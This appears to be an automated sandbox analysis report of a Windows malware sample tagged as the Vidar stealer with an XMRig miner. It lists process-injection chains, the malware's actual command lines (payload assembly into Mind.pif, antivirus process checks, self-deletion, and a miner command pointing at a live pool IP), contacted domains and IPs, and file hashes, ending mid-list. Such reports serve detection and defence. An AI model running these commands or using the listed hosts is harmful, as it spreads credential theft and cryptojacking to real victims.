Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 3196 created 3472 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\Windows\Explorer.EXE

Vidar

stealer vidar

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\543e80dbd2fa8ddf8cebccc1099b4609.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\ProgramData\AAKJEGCFBG.exe N/A
N/A N/A C:\ProgramData\HDGCGHIJKE.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3196 set thread context of 3716 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 1396 set thread context of 3568 N/A C:\ProgramData\AAKJEGCFBG.exe C:\Windows\SysWOW64\ftp.exe
PID 1868 set thread context of 2416 N/A C:\ProgramData\HDGCGHIJKE.exe C:\Windows\SysWOW64\ftp.exe
PID 2416 set thread context of 652 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 652 set thread context of 3724 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\Watcher Com SH.job C:\Windows\SysWOW64\ftp.exe N/A
File created C:\Windows\Tasks\TWI Cloud Host.job C:\Windows\SysWOW64\ftp.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\ProgramData\AAKJEGCFBG.exe N/A
N/A N/A C:\ProgramData\HDGCGHIJKE.exe N/A
N/A N/A C:\ProgramData\AAKJEGCFBG.exe N/A
N/A N/A C:\ProgramData\HDGCGHIJKE.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\ProgramData\AAKJEGCFBG.exe N/A
N/A N/A C:\ProgramData\HDGCGHIJKE.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A
N/A N/A C:\Windows\SysWOW64\ftp.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4416 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\543e80dbd2fa8ddf8cebccc1099b4609.exe C:\Windows\SysWOW64\cmd.exe
PID 4416 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\543e80dbd2fa8ddf8cebccc1099b4609.exe C:\Windows\SysWOW64\cmd.exe
PID 4416 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\543e80dbd2fa8ddf8cebccc1099b4609.exe C:\Windows\SysWOW64\cmd.exe
PID 4008 wrote to memory of 1864 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 4008 wrote to memory of 1864 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 4008 wrote to memory of 1864 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 4008 wrote to memory of 1908 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4008 wrote to memory of 1908 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4008 wrote to memory of 1908 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4008 wrote to memory of 1608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 4008 wrote to memory of 1608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 4008 wrote to memory of 1608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 4008 wrote to memory of 4520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4008 wrote to memory of 4520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4008 wrote to memory of 4520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4008 wrote to memory of 1828 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4008 wrote to memory of 1828 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4008 wrote to memory of 1828 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4008 wrote to memory of 1240 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4008 wrote to memory of 1240 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4008 wrote to memory of 1240 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4008 wrote to memory of 4028 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4008 wrote to memory of 4028 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4008 wrote to memory of 4028 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4008 wrote to memory of 3196 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 4008 wrote to memory of 3196 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 4008 wrote to memory of 3196 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 4008 wrote to memory of 2776 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4008 wrote to memory of 2776 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4008 wrote to memory of 2776 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3196 wrote to memory of 3716 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 3196 wrote to memory of 3716 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 3196 wrote to memory of 3716 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 3196 wrote to memory of 3716 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 3196 wrote to memory of 3716 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif
PID 3716 wrote to memory of 1396 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\ProgramData\AAKJEGCFBG.exe
PID 3716 wrote to memory of 1396 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\ProgramData\AAKJEGCFBG.exe
PID 3716 wrote to memory of 1396 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\ProgramData\AAKJEGCFBG.exe
PID 3716 wrote to memory of 1868 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\ProgramData\HDGCGHIJKE.exe
PID 3716 wrote to memory of 1868 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\ProgramData\HDGCGHIJKE.exe
PID 3716 wrote to memory of 1868 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\ProgramData\HDGCGHIJKE.exe
PID 1396 wrote to memory of 3568 N/A C:\ProgramData\AAKJEGCFBG.exe C:\Windows\SysWOW64\ftp.exe
PID 1396 wrote to memory of 3568 N/A C:\ProgramData\AAKJEGCFBG.exe C:\Windows\SysWOW64\ftp.exe
PID 1396 wrote to memory of 3568 N/A C:\ProgramData\AAKJEGCFBG.exe C:\Windows\SysWOW64\ftp.exe
PID 1868 wrote to memory of 2416 N/A C:\ProgramData\HDGCGHIJKE.exe C:\Windows\SysWOW64\ftp.exe
PID 1868 wrote to memory of 2416 N/A C:\ProgramData\HDGCGHIJKE.exe C:\Windows\SysWOW64\ftp.exe
PID 1868 wrote to memory of 2416 N/A C:\ProgramData\HDGCGHIJKE.exe C:\Windows\SysWOW64\ftp.exe
PID 1396 wrote to memory of 3568 N/A C:\ProgramData\AAKJEGCFBG.exe C:\Windows\SysWOW64\ftp.exe
PID 1868 wrote to memory of 2416 N/A C:\ProgramData\HDGCGHIJKE.exe C:\Windows\SysWOW64\ftp.exe
PID 3716 wrote to memory of 4432 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\Windows\SysWOW64\cmd.exe
PID 3716 wrote to memory of 4432 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\Windows\SysWOW64\cmd.exe
PID 3716 wrote to memory of 4432 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\Windows\SysWOW64\cmd.exe
PID 4432 wrote to memory of 3944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4432 wrote to memory of 3944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4432 wrote to memory of 3944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2416 wrote to memory of 652 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 2416 wrote to memory of 652 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 3568 wrote to memory of 4864 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 3568 wrote to memory of 4864 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 3568 wrote to memory of 4864 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 2416 wrote to memory of 652 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 2416 wrote to memory of 652 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 3568 wrote to memory of 4864 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 652 wrote to memory of 3724 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\543e80dbd2fa8ddf8cebccc1099b4609.exe

"C:\Users\Admin\AppData\Local\Temp\543e80dbd2fa8ddf8cebccc1099b4609.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k copy Secretariat Secretariat.cmd & Secretariat.cmd & exit

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 150746

C:\Windows\SysWOW64\findstr.exe

findstr /V "reachedindicatingfindlawfu" Cologne

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Abroad 150746\e

C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif

150746\Mind.pif 150746\e

C:\Windows\SysWOW64\timeout.exe

timeout 5

C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif

C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif

C:\ProgramData\AAKJEGCFBG.exe

"C:\ProgramData\AAKJEGCFBG.exe"

C:\ProgramData\HDGCGHIJKE.exe

"C:\ProgramData\HDGCGHIJKE.exe"

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\AKKEGDGCGDAK" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe -a rx/0 --url=65.109.127.181:3333 -u PLAYA -p PLAYA -R --variant=-1 --max-cpu-usage=70 --donate-level=1 -opencl

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 WAmbXuXSzuXabiImZi.WAmbXuXSzuXabiImZi udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 theemir.xyz udp
US 104.21.81.243:443 theemir.xyz tcp
US 8.8.8.8:53 c.pki.goog udp
GB 172.217.169.67:80 c.pki.goog tcp
US 104.21.81.243:443 theemir.xyz tcp
US 8.8.8.8:53 243.81.21.104.in-addr.arpa udp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
US 104.21.81.243:443 theemir.xyz tcp
US 104.21.81.243:443 theemir.xyz tcp
US 104.21.81.243:443 theemir.xyz tcp
US 104.21.81.243:443 theemir.xyz tcp
US 104.21.81.243:443 theemir.xyz tcp
US 104.21.81.243:443 theemir.xyz tcp
US 104.21.81.243:443 theemir.xyz tcp
US 104.21.81.243:443 theemir.xyz tcp
US 104.21.81.243:443 theemir.xyz tcp
US 104.21.81.243:443 theemir.xyz tcp
US 8.8.8.8:53 businessdownloads.ltd udp
US 104.21.16.123:443 businessdownloads.ltd tcp
US 8.8.8.8:53 123.16.21.104.in-addr.arpa udp
US 104.21.81.243:443 theemir.xyz tcp
US 8.8.8.8:53 i.imgur.com udp
US 199.232.196.193:443 i.imgur.com tcp
US 104.21.81.243:443 theemir.xyz tcp
US 104.21.81.243:443 theemir.xyz tcp
US 8.8.8.8:53 193.196.232.199.in-addr.arpa udp
US 104.21.81.243:443 theemir.xyz tcp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 104.21.81.243:443 theemir.xyz tcp
US 104.21.81.243:443 theemir.xyz tcp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
FI 135.181.22.88:80 135.181.22.88 tcp
US 8.8.8.8:53 88.22.181.135.in-addr.arpa udp
FI 65.109.127.181:3333 tcp
US 8.8.8.8:53 proresupdate.com udp
US 45.152.112.146:80 proresupdate.com tcp
FI 65.109.127.181:3333 tcp
US 8.8.8.8:53 146.112.152.45.in-addr.arpa udp
FI 65.109.127.181:3333 tcp
FI 65.109.127.181:3333 tcp
FI 65.109.127.181:3333 tcp
N/A 224.0.0.251:5353 udp

Files

C:\Users\Admin\AppData\Local\Temp\Secretariat

MD5 7f01361524f94ccde5107595e2c54200
SHA1 c1b34c5781d2f042c81c3a8128d2a9d5b7b7a084
SHA256 903bedd93e8ec45d8083f33181b8f64612c075bfddf55fc4fb5a5443f5c578dd
SHA512 bb19216799526c5c7f2bf1f29e529d63c2cd6f6cef0c9e3b236a8e90d836a655d0eb7f62a9aa91dcf8f1c8d8f0ea9753252a5e54f49768315844847196dae064

C:\Users\Admin\AppData\Local\Temp\Cologne

MD5 a7e0c610d9e51e1f07ed50a2698d841c
SHA1 856bf97f63d5b1629a73def5b539454e2bdf0925
SHA256 4458046d4cefd31f95c9844044f68b7fc95311a5e25d085a2882c6426d07977d
SHA512 60ab445f726323b9ea37eb328015dbf752065f9091d4ef19ccdf3c567e0ae731ba633a78334e245b7b5219f1580ccf8dc7790084255ae8bf143a559cbf11adc6

C:\Users\Admin\AppData\Local\Temp\Race

MD5 677c8b24ad59b6eef5dfb3faf7e0974a
SHA1 6e52ce41957b616aff5481493c30b7d84090a562
SHA256 b2f80e63c5e1073731a4656fa3e6d23d6cb7dd43d70ebea566b6bee00fee9bfd
SHA512 e013f8d3bbe9ebbf25635efb17d3554056c8318af4908825820dab0393d4ac9a26de55e4f168ba0cc84294a657680887b74b59d2b15c340b9a990021f6269c7a

C:\Users\Admin\AppData\Local\Temp\Reasons

MD5 99f7825b887660ea8f043d913522545b
SHA1 f6d36f0385ec836a40572bfcf605c8905b1a600a
SHA256 61ca2c5de8554fd7afe374c06203ea7832fdfff03f6512ef637328c66a6091a9
SHA512 ff1b9ff9aecf55b35c817e49adc0f580a45875976c462d03984eba97f93d57650da7724b42c2105eac0579c865c204e776ef762d984600c7e96fc574ace28cd2

C:\Users\Admin\AppData\Local\Temp\Estates

MD5 e3b5843f44d2382246054ea8b0706383
SHA1 a3036166a029bb1975129896e091daf40d820999
SHA256 2a790ae2e21ecf6c83b670a22509aeeca5a3ba67698cdd534817ff6e49957a84
SHA512 eac7c2bc9bfa0ad36a112b0f6878af59f9d6644e5f98842f069e741165d48d5c393790d939725c2d11606609a63ba1983c60753c3c9c4c4c273d49788190e2f8

C:\Users\Admin\AppData\Local\Temp\Changed

MD5 a2d24d16e1b5a0972e95b39e1d9a251b
SHA1 a5f7c2bcbbffef058fafe1b62c3825ce26ea5ed6
SHA256 c56805d59fc6c67afb039850fb018d90ee11ccdbecf6f7db0880f0d29e5e2a07
SHA512 8203f0ca64e37f40c923216a09216387ba9e0ef35fac7b3df1b409216ae8b4b85fb178d0622482ce04ac1cba68af938c75272b31ca3a740a1061103785e4cfad

C:\Users\Admin\AppData\Local\Temp\Lake

MD5 5ef48073ad8953dbc25cb95852577d58
SHA1 da11413d729915a120e16e15c47201ad1afd7157
SHA256 30c013ba41821acae05a5359ce75857ca66cdb03adf4560c6c0aaf2eff7b19a8
SHA512 172afe33b31994af02e8e3d13ca5a285d8869671d00fecd8e147dde26eb8e493cafbae9a60f6ef49eac8221a0e1176e625043539b2b321a934647539ae22d00d

C:\Users\Admin\AppData\Local\Temp\Then

MD5 33271f00b044ed98071d84807c2158c8
SHA1 392e6351a844de7b50be3486db834321f625b7e1
SHA256 eaab5d35bea196961ffb36b423caed9d42a6cdf723759a67d5c865db6d906eb1
SHA512 0cc39c715573a5b2e81621e83dcdaa09b29530e044be223e0b62913aa77940f196429845fca46e0838781eecd6accacb7083b95bccf60f9f3fff37d096f8a788

C:\Users\Admin\AppData\Local\Temp\Timeline

MD5 3876d86dce4359c2e28a693d2c24577f
SHA1 373222b9a4d6f9116feac281725156f024a464fc
SHA256 30286f45ff66b72cc1a5c493442f5c57c0f2c7d729f663793c57c3b8dba4cf4d
SHA512 9289622b7e57f1ce380d41073ab42dc4376d3c156d8b82f60d166650a138c6190cf98ae35002ae11f5b31926dd92f3de3724d77f9e4ed2427151794a9b03fe7e

C:\Users\Admin\AppData\Local\Temp\Fx

MD5 dfedbc594137615c08a79052a8f79e4b
SHA1 164812d22a6559b86883089a2b5b3cb2d97c320f
SHA256 7e2d5e98eefd6cc1fa44a4dda125c2d986ff0bd6b6af488213bc4992d3d6ee6e
SHA512 0ebd7c128464eaae4ba196a45201c646e669021f7a2005aa04471b521373474cc3dd8df55792585fd92bdbd6297a0fb31af18e72111fd8aa3bf39113bcb29235

C:\Users\Admin\AppData\Local\Temp\Vintage

MD5 278bae85379affaab937d9ec59eaa46d
SHA1 badcf501ff87624a68efb1ec3340d6314cc00027
SHA256 ae74ce2e63b5570786913b7f18c8bb79cd3f89d8a944a308ab036b39d7904edc
SHA512 9bfc82782f6318d4176f7fa7adad68d44421c76c179f5777e739f837d9ba5300453fbd9a1368eccbeccc24da9d1700db81f2128fde49547ed2ca86f1824ad391

C:\Users\Admin\AppData\Local\Temp\Destiny

MD5 ae51ee350f9b67d464fef7951cefe7ef
SHA1 109023e02149e2282322d285c00810a1cef0e3de
SHA256 658b597ecc79cf8cae6883b1bd37c014da410731d9ec9774b2952e8d9041793e
SHA512 bf84d806d2c10b331af8a195b654eaf7049c252db9120f72aff28cf263727b88fb432bb05f911afca7509c485f8df5b1c162ec91e4b88c76f0c19eb99f080f99

C:\Users\Admin\AppData\Local\Temp\Fighting

MD5 4a5d107b42961c4cc01ff0699b64629a
SHA1 6c31783eb1a0cf760515c21b2218f905f387c3cc
SHA256 04929738eb9987535c773a0ad904049369bc81fa6e36a35d3ff38e26d53cd696
SHA512 57dc197b44971214b61942b019609011c699f7f22972660e7f5d37e7e5cd2102501ae5d5f7b6e9031074cf9a730fbc8f128340dc640344996d0d34886f1e6b72

C:\Users\Admin\AppData\Local\Temp\Overnight

MD5 fb39a9bcb79f50bd7cd171f3c9325b96
SHA1 922d750974483d7ae4e40d873b1124835d6a865a
SHA256 04d5051668e69769a85b314d0c46556755dd11182c2982c5fac2792d62f152c0
SHA512 fe2ebb8412e8df722c0f8fd8682198654ad19707525f8bf2068d18104163e809621fef079f8f2cb6176e9897a764816144187c2b6214d2406e6a30e581d556d7

C:\Users\Admin\AppData\Local\Temp\Travelling

MD5 528985f09d3b53a80e38911b2086f45b
SHA1 8c2c8183f0883132dfe3d61a8afa5726cec9fefa
SHA256 79b144d737cbb862203146276c32deddcee0dcbe726cc877f40f0b0348a7f502
SHA512 1e661cf38f15abd8a852c01a1605eb19da137d8fb738885c72853c624066f1350cdb98205d3ed29ae286f4463dff2dca2881dddef8f7ac3ac6a9a017d8e7e842

C:\Users\Admin\AppData\Local\Temp\Flyer

MD5 9aec66d230b5a002f8e58e7c86fd5d11
SHA1 4486447e1c450f4c687ccef10433c428dd3e31d4
SHA256 0c8303cb00fe2838fbc27ffd8af0a0fc00045ce54efa40911b50f4e828edf1d6
SHA512 752119a11a7440a63602e77fa229d741078e3117b6e461b0d383a23f5059d0aef7b629eaf90abf5f2522997d0abab06e81bf258e8f823c22ce832fdb737e1fcc

C:\Users\Admin\AppData\Local\Temp\Lol

MD5 ac4c86188160adc4ea28ea1505dc18bb
SHA1 7e22e3f0d2d0aa2235b613df0413a73324dff760
SHA256 8d73e871d375f3802510b5212aba0e8ef929d62ed0396367cd3838ca7494b5b5
SHA512 a4ff143709eaddd00cd1062c940d051606039657722cc0944886a59282b8eaafed47004dcb90bf315f53acedfbdb93935fc49c2d2cf674870211854ca10b2692

C:\Users\Admin\AppData\Local\Temp\Worry

MD5 c715434dab2f93f0d1b6680c2b01b3fc
SHA1 355ea26f3a52b2c9abb457b9c56177a229cf9421
SHA256 05ddf26b6a74f039743ffd1d4d6152b8aa0add24da17aece71f9ccaa60538c4c
SHA512 7d39bf5a5362dd4d7ee51f4c963eb55cfdd3da46db093e288cec3db71c8b1bfaa304a64e539524fb62c397cd0a27c0890f3c93db4b591a84360bd47f23bfbc6a

C:\Users\Admin\AppData\Local\Temp\Impacts

MD5 315afae2384177766854966d0c39ead0
SHA1 baa183ea390760a631723c2f1494e0af8fb391e0
SHA256 229d27cf367f7844bdc9da75bcffc7c68a8b71aa1a31dd819f5ee4fe3bc42767
SHA512 384d2d0926af3ac4355461dd01e248d82b7f55a1a851d18c5ba892ba987472c13e8036e9e1a11806c8501595d19bc753290121903aa51d345af62381f6b815ab

C:\Users\Admin\AppData\Local\Temp\Fails

MD5 723321b7b3b33a2788e6cc0ba336c76d
SHA1 e17eb7189561d7f8b4fab76014124b780a3da4d7
SHA256 db1674bcd78442305a1a79773d17b61a6c5bbf830ce8e4983164c1f56198236a
SHA512 dd3c229f3b36cb07222663b8becac13df8d3a68874aee73ad20b11e18591085664ff9df27e9d84d9e9eedc00cc206db975049650f37d11bb666f1d690029c35e

C:\Users\Admin\AppData\Local\Temp\Therefore

